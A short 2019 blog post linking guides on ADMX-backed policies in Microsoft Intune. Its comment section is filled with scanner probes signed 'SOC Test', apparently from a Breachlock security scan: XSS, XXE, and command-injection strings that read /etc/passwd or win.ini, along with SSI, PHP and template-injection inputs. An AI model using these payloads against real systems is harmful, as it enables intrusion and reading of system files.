View Blog

Jan 2019
25

Creating ADMX-backed policies is hard in Intune. Here's some guides to help you.

I have to admit... making a simple registry change in Intune can be ... difficult. 

The Administrative Templates function is nice, for those (under 300 settings) that support them. 

But for the rest of the simple settings ... you might have hand-create custom OMA-URIs and usin ADMX backed policies to do it.

Here are some others' great guides to help you "follow the leaders" and convert your ADMX and/or use an ADMX-backed policy:

Those resources, show how to tear into an ADMX and ADML file and create a more complex ADMX-backed policy:

  • https://docs.microsoft.com/en-us/windows/client-management/mdm/understanding-admx-backed-policies
  • https://docs.microsoft.com/en-us/windows/client-management/mdm/enable-admx-backed-policies-in-mdm
  • https://www.petervanderwoude.nl/post/allow-users-to-connect-remotely-to-this-computer-via-windows-10-mdm-admx-style/
  • https://www.petervanderwoude.nl/post/deep-dive-configuring-windows-10-admx-backed-policies/
  • http://carlbarrett.uk/admx-backed-policies-quickish-reference-guide
  • http://thesccm.com/use-intune-policy-csp-manage-windows-10-settings-internet-explorer-site-to-zone-assignment-list/

 

Comments (34)

SOC Test

<![CDATA[<]]>script<![CDATA[>]]>alert('Breachlock XML')<![CDATA[<]]>/script<![CDATA[>]]>

SOC Test

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

SOC Test

; type %SYSTEMROOT%\win.ini

SOC Test

&& type %SYSTEMROOT%\win.ini

SOC Test

| type %SYSTEMROOT%\win.ini

SOC Test

|| type %SYSTEMROOT%\win.ini

SOC Test

%0Atype %SYSTEMROOT%\win.ini

SOC Test

<!--#echo var="DATE_LOCAL" -->

SOC Test

<

SOC Test

!

SOC Test

-

SOC Test

-

SOC Test

'

SOC Test

"

SOC Test

a

SOC Test

<?php phpinfo(); ?>

SOC Test

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file://etc/passwd" >]> <foo>&xxe;</foo>

SOC Test

; cat /etc/passwd

SOC Test

&& cat /etc/passwd

SOC Test

| cat /etc/passwd

SOC Test

|| cat /etc/passwd

SOC Test

%0Acat%20/etc/passwd

SOC Test

'

SOC Test

"

SOC Test

#

SOC Test

;

SOC Test

)

SOC Test

${9999+12}

SOC Test

"><ScRiPt>alert('Breachlock-XSS')</sCriPt>

SOC Test

<IMG SRC=”javascript:alert('Breachlock-XSS');”>

SOC Test

"><img src=x onerror=javascript:alert('Breachlock-XSS');>

SOC Test

</script><script>alert('Breachlock-XSS')</script>

SOC Test

<h1>BREACHLOCK HTML Injection</h1>

SOC Test

breachlock'

leave us a comment

You must be logged in to MDMandGPanswers.com to make a comment.